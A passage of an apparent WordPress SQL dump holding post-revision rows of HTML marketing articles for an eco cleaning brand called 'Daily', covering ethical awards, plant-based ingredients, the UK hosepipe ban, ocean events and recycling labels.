of the <a href=\"../../friends/observer-ethical-awards/\">Observer Ethical Awards</a> for a while now. Designed to recognise and reward the green pioneers and ethical innovators of the world, each year brings a raft of even more brilliant ideas and inventions from nominees.\r\n\r\nDaily are particularly proud to sponsor the Kids category; we believe it\'s important to encourage an understanding of ethical issues in the next generation of bright young things. After all, if they\'re coming up with such groundbreaking ideas now, we can only imagine what they\'ll be capable of in future.\r\n\r\nPrevious winners of the Kids category have given us the <a href=\"../../articles/bat-or-bird-box/\">BOB (Bat Or Bird) Box</a>, secret wildlife gardens and plastic recycling projects - all from the creative minds of the under 16s. And the time has come to nominate for the next round of awards.\r\n\r\n&nbsp;\r\n<h3>Nominate a great, green idea</h3>\r\nIf you\'ve had an ethical business idea, come up with an innovative invention or embarked on a project that\'s had a positive impact on your local community, or if you know a young person who has, this is your chance to shout about it. Nominate yourself (or someone else) in the Observer Ethical Awards 2018 Kids category and, if you\'re a winner, you could get £2,000 a year over three years to develop your project, courtesy of Daily.\r\n\r\nFind out more about the <a href=\"http://www.guardian.co.uk/environment/2018/jan/15/observer-ethical-awards-2018\" target=\"_blank\" rel=\"nofollow noopener\">Observer Ethical Awards 2018</a>.\r\n\r\nThis year\'s winners have just been announced:','Observer Ethical Values - Nominate your winner','','inherit','closed','closed','','47-revision-v1','','','2017-10-17 08:48:13','2017-10-17 08:48:13','',47,'http://www.dailyjolly.co.uk/47-revision-v1',0,'revision','',0),(89,1,'2017-10-17 08:48:33','2017-10-17 08:48:33','You\'ve heard the phrase \'tidy home, tidy mind\'. So if your aim is to not be so stressed, or you want to keep the home in better shape, why not also kick the \'nasties\' with Daily. Now that truly is Feel Good.\r\n<div class=\"highlight blue\">\r\n\r\nTop 5 Facts:\r\n<ol>\r\n 	<li>No <a href=\"../../articles/about-ecover/\">phosphates</a></li>\r\n 	<li>No <a href=\"../../articles/optical-brighteners/\">optical brighteners</a></li>\r\n 	<li>No <a href=\"../../articles/foam-boosters/\">foam boosters</a></li>\r\n 	<li><a href=\"../../articles/fantastic-plantastic/\">Plant-based ingredients</a></li>\r\n 	<li><a href=\"../../articles/cruelty-free-products/\">Cruelty-free products</a></li>\r\n</ol>\r\nKind to you, your family and nature\r\n\r\n</div>\r\nYou may not know but many conventional brands of laundry, cleaning and homecare products contain certain chemical ingredients that can be considered a \'nasty\'.\r\n\r\nDaily products contain natural, sustainable <a href=\"../../articles/our-ingredients/\">plant-based ingredients</a> which are kinder to your family and the environment.\r\n\r\nFutile ingredients such as <a href=\"../../articles/optical-brighteners/\">optical brighteners</a>, a \'nasty\', are used in some laundry products to make your clothes appear brighter so it\'s assumed they\'re cleaner! And that\'s just one example. There are many \'nasties\' on your supermarket shelf.\r\n\r\nAs cleaning and laundry products are an essential aspect of everyone\'s day, it is important that they are kind to your skin. Another reason Daily is committed to having \'no nasties\' in our products is to save your skin from potential irritants which could cause discomfort. We are so dedicated in looking out for you that we have been accredited with the <a href=\"../../articles/sensitive-skin/\">\'Sensitive Skin\'</a> logo.\r\n\r\nDon\'t be misled by thinking that because we are skin kind and less harmful to the environment that we don\'t work. We are GHI approved which means you don\'t have to compromise with those nasties!\r\n\r\nWe can help you achieve the \'tidy home, tidy mind\' as well as keeping the tidy planet too. Now that\'s one New Year\'s resolution worth keeping.\r\n\r\nSo what are you waiting for? We\'re 3 for 2 at <a href=\"http://www.ecoverdirect.com/promotions/green-cleaning-start-to-2013.aspx?promotion=315\" target=\"_blank\" rel=\"noopener\">DailyDirect</a> to help you on your way.','Eco-friendly products contain no Nasties','','inherit','closed','closed','','46-revision-v1','','','2017-10-17 08:48:33','2017-10-17 08:48:33','',46,'http://www.dailyjolly.co.uk/46-revision-v1',0,'revision','',0),(90,1,'2017-10-17 08:48:52','2017-10-17 08:48:52','\r\n<h2 class=\"title\">Friends in Stylish Places</h2>\r\nIf you know your Lanvin from your Louboutin, you\'ll know that September features one of the most important events in the fashion diary: London Fashion Week (LFW). For the fifth year running, LFW\'s eco collective Estethica will once again prove that green is the new black as it showcases the best in UK ethical fashion.\r\n\r\nSince its creation by the British Fashion Council in 2006, Estethica has become the centre of ethical fashion in London. This year, the Estethica Collective will be supporting the work of 20 eco designers, all of which use fair-trade and ethical practices, organic and recycled materials to create desirable, cutting edge pieces coveted by some of the most serious fashionistas.\r\n\r\nOne such designer is ethical pioneer and good friend of Daily, <a href=\"../../friends/ada-zanditon/\">Ada Zanditon</a>. Having worked with Ada on a number of eco projects, we\'re huge supporters of her local, ethical approach to fashion design. Ada\'s signature style centres on digitally printed patterns and sculptured, structured shapes, all created from locally sourced, sustainable materials and made with as little waste as possible. Her aim is to create clothes that are as green as they are glamorous, and her collections feature both on-trend designs and future classics. While in the past, Ada\'s pieces have been inspired by everything from bees to geometry, this year she cites her inspiration as \"seahorses, Greek goddesses and Haiti Kanaval\". We can\'t wait to catch a glimpse of her ready-to-wear collection when it hits the runway.\r\n\r\nLFW begins mid September and, along with many others, we\'re looking forward to witnessing the ethical fashion world\'s take on a new season of style. Our passion for fashion stems from a love of innovation; we\'re inspired by anyone who takes a greener approach and does things differently. Of course, it works both ways - the reason designers such as Ada love Daily is because our washing powders, liquids and conditioners are kinder to both their beloved pieces, and our beloved environment.\r\n\r\nWith such a natural fit between Daily and the fashion world, you can expect plenty more ethical fashion news to come. Watch this space!\r\n\r\n\r\n</form>&nbsp;','Ada Zanditon at London Fashion Week','','inherit','closed','closed','','45-revision-v1','','','2017-10-17 08:48:52','2017-10-17 08:48:52','',45,'http://www.dailyjolly.co.uk/45-revision-v1',0,'revision','',0),(91,1,'2017-10-17 08:48:58','2017-10-17 08:48:58','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"The south-east faces a hosepipe ban this summer. Find out how Ecover\'s water-friendly products can help you to maintain your garden during this period.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/hosepipe-ban\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jqueryui/1.10.3/jquery-ui.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.6.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.6.css\" media=\"screen\"/>\n    <link href=\"//http://fonts.googleapis.com/css?family=Open+Sans Condensed:300italic,300,700\" rel=\"stylesheet\" type=\"text/css\">\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n  var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://\' : \'http://\') + \'stats.g.doubleclick.net/dc.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section our-beautiful-world-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/hosepipe-ban/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n                                                        \n														<h2 class=\"title\">The UK hosepipe ban</h2>\n                                                        <p>\n                                                            Here at Daily, it\'s our mission to create <a href=\"http://www.ecoverdirect.com/\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">products that don\'t pollute</a> our rivers and oceans. \n                                                        </p>\n                                                        <p>\n                                                            We admit it; we\'re just a little bit obsessed with water.\n                                                        </p>\n                                                        <p>\n                                                            So we\'ve been paying close attention to the latest news of a hosepipe ban. Parts of the country are now prohibited from using hosepipes \'for recreational use\', which means no washing cars and windows, watering gardens or filling ponds and swimming pools with hosepipes. It comes after two dry winters have left reservoirs and rivers running low. Whilst few of us have the luxury of a swimming pool, most of us do enjoy our gardens - and for many it\'s this love of nature that has us reaching for more eco-friendly products like Daily.\n                                                        </p>\n                                                        <div class=\"highlight2\">\n                                                            <p>\"...1/2 million Olympic swimming pools worth of water would be safeguarded against pollution...\"</p>\n                                                        </div>\n                                                        <p>\n                                                            If there\'s one thing the hosepipe ban proves it\'s that we each, as individuals, play a part in maintaining our country\'s and our planet\'s water supply.<br style=\"clear:both;\"/>\n                                                        </p>\n                                                        <h3>\n                                                            Using Daily can help\n                                                        </h3>\n                                                        <p>\n                                                            At Daily we think long and hard about the water we use, from its part in the production process to its role in your home. Whether or not you\'re in an area affected by the ban, by using Daily you\'ll be helping to prevent the wastage and pollution of the UK\'s water supply:\n                                                            <ul>\n                                                                <li>All Daily products are designed to have the minimum impact on aquatic life. The biodegradable ingredients we use break down once washed away. Many chemicals do not, like <a href=\"../../articles/optical-brighteners/\">optical brighteners</a> and the wrappers on liquitabs which linger in our water supply to the extent that they can affect the water we drink. So we simply refuse to use them. </li>\n                                                                <li>We pay close attention to the \'critical dilution volume\' - or how much water it takes to neutralise a product. For example, each dose of <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/products/toilet-cleaner-pine-fresh/etoiletpf750ml.aspx?productid=etoiletpf750ml\" target=\"_blank\">Daily toilet cleaner</a> takes 20 times less water to neutralise than its nearest competitor.</li>\n                                                                <li>Some of our products, such as our <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/products/multi-surface-spray-500ml/emsp500ml.aspx?productid=emsp500ml\" target=\"_blank\">Multi-Action Spray</a>, don\'t need any water to work their magic. Just squirt and wipe - no tap needed.</li>\n                                                                <li>You can re-use the \'grey water\' from your household cleaning tasks to water your garden. Simply leave your bucket outside for 2-3 days to allow the ingredients to break down, then slosh it where needed - whether it\'s your marigold bed or marrow patch.                                                        </li>\n                                                            </ul>\n                                                        <p>\n                                                            Our water system may be global, but individual actions really do matter. If 5% of families in the UK switched to <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\">Daily Biological washing powder</a> from a conventional product, in excess of 1/2 million Olympic swimming pools worth of water would be safeguarded against pollution in a year - all because our Bio powder takes 5000 less litres to neutralise per dose than a conventional Bio powder. It\'s a small step, but using Daily can make a big difference.\n                                                        </p>\n                                                        <div class=\"highlight\"></div>\n                                                        <p>\n                                                            We\'d love to know what you think about the hosepipe ban. Will you be affected? Do you already take measures to conserve water in your home and garden? Why not sign-up to become an <a href=\"../../my-ecover/forums/topics/\">Agent of Change</a> and share your tips with other Daily lovers.\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                          <div id=\"sidebar\">\n                            <div class=\"tabset-wrapper\">\n                              <div class=\"tabset-holder\">\n                                <div class=\"b\">\n														</div>\n													</div>\n												</div>\n											</div>\n										</div>\n									</div>\n								</div>\n								<div class=\"box-b\"></div>\n							</div>\n						</div>\n												<div id=\"inner-footer\">\n							<div class=\"footer-section\">\n								<div class=\"t\"></div>\n								\n								<div class=\"b\"></div>\n							</div>\n							<div class=\"bottom-panel contrast\"></div>\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','The UK Hosepipe Ban','The south-east faces a hosepipe ban this summer. Find out how Ecover\'s water-friendly products can help you to maintain your garden during this period.','inherit','closed','closed','','44-autosave-v1','','','2017-10-17 08:48:58','2017-10-17 08:48:58','',44,'http://www.dailyjolly.co.uk/44-autosave-v1',0,'revision','',0),(92,1,'2017-10-17 08:49:16','2017-10-17 08:49:16','<h2 class=\"title\">The UK hosepipe ban</h2>\r\nHere at Daily, it\'s our mission to create <a href=\"http://www.ecoverdirect.com/\" target=\"_blank\" rel=\"noopener\">products that don\'t pollute</a> our rivers and oceans.\r\n\r\nWe admit it; we\'re just a little bit obsessed with water.\r\n\r\nSo we\'ve been paying close attention to the latest news of a hosepipe ban. Parts of the country are now prohibited from using hosepipes \'for recreational use\', which means no washing cars and windows, watering gardens or filling ponds and swimming pools with hosepipes. It comes after two dry winters have left reservoirs and rivers running low. Whilst few of us have the luxury of a swimming pool, most of us do enjoy our gardens - and for many it\'s this love of nature that has us reaching for more eco-friendly products like Daily.\r\n<div class=\"highlight2\">\r\n\r\n\"...1/2 million Olympic swimming pools worth of water would be safeguarded against pollution...\"\r\n\r\n</div>\r\nIf there\'s one thing the hosepipe ban proves it\'s that we each, as individuals, play a part in maintaining our country\'s and our planet\'s water supply.\r\n<h3>Using Daily can help</h3>\r\nAt Daily we think long and hard about the water we use, from its part in the production process to its role in your home. Whether or not you\'re in an area affected by the ban, by using Daily you\'ll be helping to prevent the wastage and pollution of the UK\'s water supply:\r\n<ul>\r\n 	<li>All Daily products are designed to have the minimum impact on aquatic life. The biodegradable ingredients we use break down once washed away. Many chemicals do not, like <a href=\"../../articles/optical-brighteners/\">optical brighteners</a> and the wrappers on liquitabs which linger in our water supply to the extent that they can affect the water we drink. So we simply refuse to use them.</li>\r\n 	<li>We pay close attention to the \'critical dilution volume\' - or how much water it takes to neutralise a product. For example, each dose of <a href=\"http://www.ecoverdirect.com/products/toilet-cleaner-pine-fresh/etoiletpf750ml.aspx?productid=etoiletpf750ml\" target=\"_blank\" rel=\"noopener\">Daily toilet cleaner</a> takes 20 times less water to neutralise than its nearest competitor.</li>\r\n 	<li>Some of our products, such as our <a href=\"http://www.ecoverdirect.com/products/multi-surface-spray-500ml/emsp500ml.aspx?productid=emsp500ml\" target=\"_blank\" rel=\"noopener\">Multi-Action Spray</a>, don\'t need any water to work their magic. Just squirt and wipe - no tap needed.</li>\r\n 	<li>You can re-use the \'grey water\' from your household cleaning tasks to water your garden. Simply leave your bucket outside for 2-3 days to allow the ingredients to break down, then slosh it where needed - whether it\'s your marigold bed or marrow patch.</li>\r\n</ul>\r\nOur water system may be global, but individual actions really do matter. If 5% of families in the UK switched to <a href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\" rel=\"noopener\">Daily Biological washing powder</a> from a conventional product, in excess of 1/2 million Olympic swimming pools worth of water would be safeguarded against pollution in a year - all because our Bio powder takes 5000 less litres to neutralise per dose than a conventional Bio powder. It\'s a small step, but using Daily can make a big difference.\r\n<div class=\"highlight\"></div>\r\nWe\'d love to know what you think about the hosepipe ban. Will you be affected? Do you already take measures to conserve water in your home and garden? Why not sign-up to become an <a href=\"../../my-ecover/forums/topics/\">Agent of Change</a> and share your tips with other Daily lovers.\r\n\r\n&nbsp;','The UK Hosepipe Ban','The south-east faces a hosepipe ban this summer. Find out how Ecover\'s water-friendly products can help you to maintain your garden during this period.','inherit','closed','closed','','44-revision-v1','','','2017-10-17 08:49:16','2017-10-17 08:49:16','',44,'http://www.dailyjolly.co.uk/44-revision-v1',0,'revision','',0),(93,1,'2017-10-17 08:49:58','2017-10-17 08:49:58','<h2 class=\"title\">Our Ingredients</h2>\r\n<h3>What are the criteria for choosing the materials that Daily uses?</h3>\r\nDaily are committed to using plant based ingredients. By their very nature they conform to the following criteria, renewable sourcing, rapid complete bio-degradability, low aquatic toxicity and high skin tolerance.\r\n<h3>Which plant-based materials does Daily use?</h3>\r\nDaily uses plant raw materials such as herbs, starch and wood fibres (cellulose), rapeseed, palm and coconut oil, and essential oils from, for example, orange peel and other plants. These raw materials are either used directly or after they have been processed to ensure full use of the cleansing power of nature. During processing we try and remain as closely to the original raw material as possible. We call this soft chemistry. Apart from plant ingredients, we also use minerals and mineral derivatives, such as sand, lime, zeolite and silicate. These minerals are found naturally in enormous quantities (for example, 75% of the earth\'s crust consists of silicate). There is no danger of depletion and permanent damage to ecosystems during extraction of these minerals. However the extraction of petroleum, for example, is damaging and reserves are being depleted beyond repair.\r\n<h3>What are the benefits of using plant-based ingredients?</h3>\r\nThere are clear advantages to using plant-based ingredients:\r\n<ul>\r\n 	<li>there is no danger of depletion since they are produced by nature itself and are constantly replenished</li>\r\n 	<li>they are fast, simple and completely biodegradable, hence, the burden on nature is minimised, which is of additional advantage to man and animal</li>\r\n 	<li>their production only requires little energy, which means that the contribution to the greenhouse effect is reduced; Contrary to petrochemical ingredients, hardly any harmful or poorly degradable waste products are released during their production</li>\r\n 	<li>they cause no damage to the environment. This isn\'t the case during extraction, transport, refining and processing of petrochemical raw materials (think of the enormous damage done to water life, coastal areas and the local economy caused by the disaster with the Exxon Valdez)</li>\r\n 	<li>oil extraction only benefits a small group (oil sheiks, oil companies) whilst the production of plant ingredients benefits a much larger part of the population</li>\r\n</ul>','Our Ingredients','','inherit','closed','closed','','49-revision-v1','','','2017-10-17 08:49:58','2017-10-17 08:49:58','',49,'http://www.dailyjolly.co.uk/49-revision-v1',0,'revision','',0),(94,1,'2017-10-17 08:50:30','2017-10-17 08:50:30','<h1>Jacob talks about plastics, Daily and this year\'s Blue Mile event!!</h1>\r\n<strong>The Daily Blue Mile\'s best known supporter, Paul Rose, talks about why he loves the event so much and what we can all do to ensure our oceans have a brighter future.</strong>\r\n\r\nWhen it comes to oceans there\'s not much that Daily Blue Mile Ambassador Paul Rose hasn\'t done. He is one of the most pre-eminent divers on the world today, supporting and leading scientific missions with the aim of protecting the marine environment. We caught up with Paul and asked him about his current projects.\r\n\r\n\"I\'ve been working very hard on ocean debris,\" said Paul. \"From a consumer point of view, we can all do a lot to help - by becoming aware of the issue and by looking at what we do in our daily lives in terms of disposing of our waste. Each of us can make an enormous difference.\"\r\n\r\n\"And I really do believe that the future is brighter for the oceans, too. The solutions that are coming up, particularly from the next generation, are really, really creative. Daily for example, is providing leadership with innovations <a href=\"../../message-in-our-bottle/\">in their plastics projects</a>, which is of enormous benefit to us all.\"\r\n\r\n\"I love the sea and in fact... I\'m a huge supporter of the <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"noopener\">Daily Blue Mile</a>. Firstly, it\'s fun! And I think you can capture people\'s imagination. It\'s also challenging without being out of anybody\'s reach and you can do it in a number of different ways - by swimming, stand up paddling or kayaking the Blue Mile.\"\r\n\r\nPaul is taking part in the Corporate Team Challenge for the Daily Blue Mile team, doing the kayaking over a one mile course off Plymouth\'s Barbican on the Saturday afternoon of the two-day event. That evening, he\'ll be delivering a few words at the Gala Dinner at the Boathouse Café, a fundraising event for the Daily Blue Mile\'s chosen charity, the Marine Conservation Society.','Discussing plastics with Jacob','Paul Rose talks about plastics, Ecover and this year\'s Blue Mile event!!!','inherit','closed','closed','','50-revision-v1','','','2017-10-17 08:50:30','2017-10-17 08:50:30','',50,'http://www.dailyjolly.co.uk/50-revision-v1',0,'revision','',0),(95,1,'2017-10-17 08:51:08','2017-10-17 08:51:08','<h2 class=\"title\">Launching the Rainbow Warrior III</h2>\r\nIn July 1985, Greenpeace\'s converted fishing trawler \'The Rainbow Warrior\' was on its way to Moruroa, French Polynesia, in the Pacific Ocean - an area that had suffered nuclear testing at the hands of the French since 1962. Greenpeace sailed The Rainbow Warrior to the island in order to bear witness to the ecological destruction of nuclear testing first-hand. Residents of the neighbouring Marshall Islands had already been relocated by Greenpeace, having been blighted by cancer, leukaemia and birth defects.\r\n\r\nThe mere presence of Greenpeace and their intention to expose the effects of nuclear testing posed such a threat that the French Government felt it necessary to take action; they did so by ordering the French Secret Service to bomb The Rainbow Warrior.\r\n<h3>\"You can\'t sink a rainbow\"</h3>\r\nThe bombing caused worldwide outrage, not least because tragically one crew member was killed. When the truth was revealed, the French Minister for Defence was forced to resign and the United Nations stepped in. The Rainbow Warrior became an icon - a symbol not only of Greenpeace, but of the power of protest. The slogan \"You Can\'t Sink A Rainbow\" was coined.\r\n\r\n26 years later, while the original Rainbow Warrior lies at the bottom of the Pacific slowly turning into a living reef, and it\'s successor the Rainbow Warrior II has been retired to serve as a hospital ship in Bangladesh, a new, purpose built Rainbow Warrior III is about to be revealed.\r\n\r\nDesigned with sustainability in mind, the Rainbow Warrior III is the most environmentally advanced ship of its size, and it represents the realisation of a dream come true for many of Greenpeace\'s seafaring crew. The 60m long boat is powered primarily by sails hoisted onto two 50ft masts, switching to a state-of-the-art hybrid engine when needed. Every component from materials to paint and insulation has been sourced ethically and cupboards will be stocked with Daily products enabling crew to wash, wipe, scour and scrub with minimal impact on the environment. Thanks to the latest technology, the boat has the ability to drop speedboats from its sides in record time for a quick approach or getaway. A helicopter pad can be created above deck, and the vessel features a radio room built with reinforced doors that will allow a further 30 minutes transmission time should the vessel be boarded by anyone wishing to disrupt proceedings. Clearly, The Rainbow Warrior III is a boat that means business.','Rainbow Warrior III','','inherit','closed','closed','','51-revision-v1','','','2017-10-17 08:51:08','2017-10-17 08:51:08','',51,'http://www.dailyjolly.co.uk/51-revision-v1',0,'revision','',0),(96,1,'2017-10-17 08:51:20','2017-10-17 08:51:20','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n	<link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/recycling-labels\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section facts-about-ecover-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/recycling-labels/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">A clearer label makes recycling easier than ever</h2>\n														<p>\n                                                            Ever found yourself in a tizz about what you can and can\'t recycle? We know how you feel! With so much different packaging around these days, you almost need a science degree to know what\'s what.\n                                                        </p>\n														<p>\n                                                            <strong>Fortunately, the Waste and Resources Action Programme (WRAP) has come to the rescue with an easy to read, straightforward recycling label.</strong>\n                                                            A bit like the nutrition wheel you see on food packets, the WRAP label offers a clear explanation about which parts of the packaging can be recycled and which parts should go out with the other rubbish. \n                                                        </p>\n														<p>\n                                                            Any company can choose to use the WRAP label on its products, and Daily are excited to be a keen participant in the scheme. It\'s our way of making Daily lovers\' lives just a little bit easier.\n                                                        </p>\n														<div class=\"clear\"></div>\n														<p>\n                                                            Here\'s the label in all its simple, understated glory, and what it means to you:\n                                                        </p>\n														<br/>\n														<p>\n                                                            We love the new label because it means companies have to be honest about every part of their packaging. \n                                                        </p>\n														\n                                                        <p>\n                                                            It keeps things simple. Recycle away!\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                          <div id=\"sidebar\">\n                            <div class=\"tabset-wrapper\">\n                              <div class=\"tabset-holder\">\n													</div>\n												</div>\n											</div>\n										</div>\n									</div>\n								</div>\n								<div class=\"box-b\"></div>\n							</div>\n						</div>\n												<div id=\"inner-footer\">\n							<div class=\"footer-section\">\n								<div class=\"t\"></div>\n								\n								<div class=\"b\"></div>\n							</div>\n							<div class=\"bottom-panel contrast\"></div>\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Recycling labels','','inherit','closed','closed','','52-autosave-v1','','','2017-10-17 08:51:20','2017-10-17 08:51:20','',52,'http://www.dailyjolly.co.uk/52-autosave-v1',0,'revision','',0),(97,1,'2017-10-17 08:51:32','2017-10-17 08:51:32','<div class=\"content\">\r\n<h2 class=\"title\">A clearer label makes recycling easier than ever</h2>\r\nEver found yourself in a tizz about what you can and can\'t recycle? We know how you feel! With so much different packaging around these days, you almost need a science degree to know what\'s what.\r\n\r\n<strong>Fortunately, the Waste and Resources Action Programme (WRAP) has come to the rescue with an easy to read, straightforward recycling label.</strong>\r\nA bit like the nutrition wheel you see on food packets, the WRAP label offers a clear explanation about which parts of the packaging can be recycled and which parts should go out with the other rubbish.\r\n\r\nAny company can choose to use the WRAP label on its products, and Daily are excited to be a keen participant in the scheme. It\'s our way of making Daily lovers\' lives just a little bit easier.\r\n<div class=\"clear\"></div>\r\nHere\'s the label in all its simple, understated glory, and what it means to you:\r\n\r\n&nbsp;\r\n\r\nWe love the new label because it means companies have to be honest about every part of their packaging.\r\n\r\nIt keeps things simple. Recycle away!\r\n\r\n</div>','Recycling labels','','inherit','closed','closed','','52-revision-v1','','','2017-10-17 08:51:32','2017-10-17 08:51:32','',52,'http://www.dailyjolly.co.uk/52-revision-v1',0,'revision','',0),(98,1,'2017-10-17 08:51:36','2017-10-17 08:51:36','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 